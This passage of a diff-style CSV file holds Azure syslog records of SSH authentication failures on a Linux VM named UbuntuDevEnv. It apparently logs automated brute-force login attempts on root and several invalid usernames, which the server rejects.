+9371,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:36:59,UbuntuDevEnv,2019-06-25 22:36:59,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 56187 ssh2,47306,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,56187,,
+9372,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:02,UbuntuDevEnv,2019-06-25 22:37:01,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 56187 ssh2,47306,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,56187,,
+9373,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:04,UbuntuDevEnv,2019-06-25 22:37:04,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 56187 ssh2,47306,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,56187,,
+9374,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:07,UbuntuDevEnv,2019-06-25 22:37:07,auth,UbuntuDevEnv,info,Invalid user waski from 152.250.252.179 port 40520,47357,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,waski,152.250.252.1,40520,,
+9375,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:07,UbuntuDevEnv,2019-06-25 22:37:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=152.250.252.179,47357,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,152.250.252.1,,0,
+9376,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:07,UbuntuDevEnv,2019-06-25 22:37:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,47357,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9377,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:07,UbuntuDevEnv,2019-06-25 22:37:07,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 56187 ssh2,47306,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,56187,,
+9378,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:09,UbuntuDevEnv,2019-06-25 22:37:09,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 56187 ssh2,47306,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,56187,,
+9379,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:09,UbuntuDevEnv,2019-06-25 22:37:09,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 56187 ssh2 [preauth],47306,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,56187,,
+9380,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:09,UbuntuDevEnv,2019-06-25 22:37:09,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 56187: Too many authentication failures [preauth],47306,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,56187,,
+9381,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:09,UbuntuDevEnv,2019-06-25 22:37:09,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,47306,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9382,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:09,UbuntuDevEnv,2019-06-25 22:37:09,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,47306,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9383,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:10,UbuntuDevEnv,2019-06-25 22:37:09,auth,UbuntuDevEnv,info,Failed password for invalid user waski from 152.250.252.179 port 40520 ssh2,47357,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,waski,152.250.252.1,40520,,
+9384,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:10,UbuntuDevEnv,2019-06-25 22:37:09,auth,UbuntuDevEnv,info,Disconnected from invalid user waski 152.250.252.179 port 40520 [preauth],47357,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,waski,152.250.252.1,40520,,
+9385,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:10,UbuntuDevEnv,2019-06-25 22:37:09,auth,UbuntuDevEnv,info,Received disconnect from 152.250.252.179 port 40520:11: Bye Bye [preauth],47357,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,152.250.252.1,40520,,
+9386,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:13,UbuntuDevEnv,2019-06-25 22:37:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,47373,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9387,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:15,UbuntuDevEnv,2019-06-25 22:37:14,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 2336 ssh2,47373,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,2336,,
+9388,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:28,UbuntuDevEnv,2019-06-25 22:37:28,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 218.92.0.175 port 2336 ssh2],47373,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,2336,,
+9389,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:28,UbuntuDevEnv,2019-06-25 22:37:28,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 2336 ssh2 [preauth],47373,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,2336,,
+9390,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:28,UbuntuDevEnv,2019-06-25 22:37:28,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,47373,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9391,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:28,UbuntuDevEnv,2019-06-25 22:37:28,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 2336: Too many authentication failures [preauth],47373,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,2336,,
+9392,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:28,UbuntuDevEnv,2019-06-25 22:37:28,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,47373,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9393,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:30,UbuntuDevEnv,2019-06-25 22:37:29,auth,UbuntuDevEnv,info,Invalid user engineering from 59.100.246.170 port 49953,47437,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,engineering,59.100.246.1,49953,,
+9394,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:30,UbuntuDevEnv,2019-06-25 22:37:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,47437,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9395,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:30,UbuntuDevEnv,2019-06-25 22:37:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=59.100.246.170,47437,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,59.100.246.1,,0,
+9396,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:32,UbuntuDevEnv,2019-06-25 22:37:32,auth,UbuntuDevEnv,info,Failed password for invalid user engineering from 59.100.246.170 port 49953 ssh2,47437,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,engineering,59.100.246.1,49953,,
+9397,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:32,UbuntuDevEnv,2019-06-25 22:37:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,47443,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9398,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:33,UbuntuDevEnv,2019-06-25 22:37:32,auth,UbuntuDevEnv,info,Disconnected from invalid user engineering 59.100.246.170 port 49953 [preauth],47437,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,engineering,59.100.246.1,49953,,
+9399,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:33,UbuntuDevEnv,2019-06-25 22:37:32,auth,UbuntuDevEnv,info,Received disconnect from 59.100.246.170 port 49953:11: Bye Bye [preauth],47437,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,59.100.246.1,49953,,
+9400,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:34,UbuntuDevEnv,2019-06-25 22:37:33,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 13646 ssh2,47443,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,13646,,
+9401,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:50,UbuntuDevEnv,2019-06-25 22:37:50,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 13646: Too many authentication failures [preauth],47443,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,13646,,
+9402,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:50,UbuntuDevEnv,2019-06-25 22:37:50,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 218.92.0.175 port 13646 ssh2],47443,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,13646,,
+9403,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:50,UbuntuDevEnv,2019-06-25 22:37:50,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 13646 ssh2 [preauth],47443,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,13646,,
+9404,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:50,UbuntuDevEnv,2019-06-25 22:37:50,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,47443,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9405,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:50,UbuntuDevEnv,2019-06-25 22:37:50,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,47443,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9406,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:53,UbuntuDevEnv,2019-06-25 22:37:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,47529,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9407,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:37:55,UbuntuDevEnv,2019-06-25 22:37:55,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 26157 ssh2,47529,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,26157,,
+9408,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:02,UbuntuDevEnv,2019-06-25 22:38:00,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 218.92.0.175 port 26157 ssh2],47529,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,26157,,
+9409,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:03,UbuntuDevEnv,2019-06-25 22:38:03,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 26157 ssh2,47529,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,26157,,
+9410,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:08,UbuntuDevEnv,2019-06-25 22:38:06,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 26157 ssh2,47529,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,26157,,
+9411,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:08,UbuntuDevEnv,2019-06-25 22:38:08,auth,UbuntuDevEnv,info,Connection closed by 139.199.113.140 port 54106 [preauth],47577,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.113.1,54106,,
+9412,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:10,UbuntuDevEnv,2019-06-25 22:38:10,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 26157 ssh2,47529,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,26157,,
+9413,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:10,UbuntuDevEnv,2019-06-25 22:38:10,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,47529,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9414,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:10,UbuntuDevEnv,2019-06-25 22:38:10,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 218.92.0.175 port 26157: Too many authentication failures [preauth],47529,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,26157,,
+9415,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:10,UbuntuDevEnv,2019-06-25 22:38:10,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 218.92.0.175 port 26157 ssh2 [preauth],47529,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,26157,,
+9416,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:10,UbuntuDevEnv,2019-06-25 22:38:10,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,47529,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+9417,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:19,UbuntuDevEnv,2019-06-25 22:38:18,auth,UbuntuDevEnv,info,Invalid user arkserver from 178.62.54.79 port 33998,47625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,arkserver,178.62.54.7,33998,,
+9418,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:19,UbuntuDevEnv,2019-06-25 22:38:18,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,47625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9419,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:19,UbuntuDevEnv,2019-06-25 22:38:18,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=178.62.54.79,47625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,178.62.54.7,,0,
+9420,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:21,UbuntuDevEnv,2019-06-25 22:38:21,auth,UbuntuDevEnv,info,Failed password for invalid user arkserver from 178.62.54.79 port 33998 ssh2,47625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,arkserver,178.62.54.7,33998,,
+9421,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:21,UbuntuDevEnv,2019-06-25 22:38:21,auth,UbuntuDevEnv,info,Received disconnect from 178.62.54.79 port 33998:11: Bye Bye [preauth],47625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,178.62.54.7,33998,,
+9422,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:21,UbuntuDevEnv,2019-06-25 22:38:21,auth,UbuntuDevEnv,info,Disconnected from invalid user arkserver 178.62.54.79 port 33998 [preauth],47625,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,arkserver,178.62.54.7,33998,,
+9423,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:24,UbuntuDevEnv,2019-06-25 22:38:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.175  user=root,47611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,218.92.0.1,,0,
+9424,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:25,UbuntuDevEnv,2019-06-25 22:38:24,auth,UbuntuDevEnv,info,Invalid user movies from 77.232.128.87 port 45945,47648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,movies,77.232.128.8,45945,,
+9425,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:25,UbuntuDevEnv,2019-06-25 22:38:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,47648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+9426,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:25,UbuntuDevEnv,2019-06-25 22:38:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.232.128.87,47648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.232.128.8,,0,
+9427,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:26,UbuntuDevEnv,2019-06-25 22:38:26,auth,UbuntuDevEnv,info,Failed password for root from 218.92.0.175 port 38351 ssh2,47611,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,218.92.0.1,38351,,
+9428,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:27,UbuntuDevEnv,2019-06-25 22:38:27,auth,UbuntuDevEnv,info,Failed password for invalid user movies from 77.232.128.87 port 45945 ssh2,47648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,movies,77.232.128.8,45945,,
+9429,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:27,UbuntuDevEnv,2019-06-25 22:38:27,auth,UbuntuDevEnv,info,Disconnected from invalid user movies 77.232.128.87 port 45945 [preauth],47648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,movies,77.232.128.8,45945,,
+9430,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-25 22:38:27,UbuntuDevEnv,2019-06-25 22:38:27,auth,UbuntuDevEnv,info,Received disconnect from 77.232.128.87 port 45945:11: Bye Bye [preauth],47648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.232.128.8,45945,,
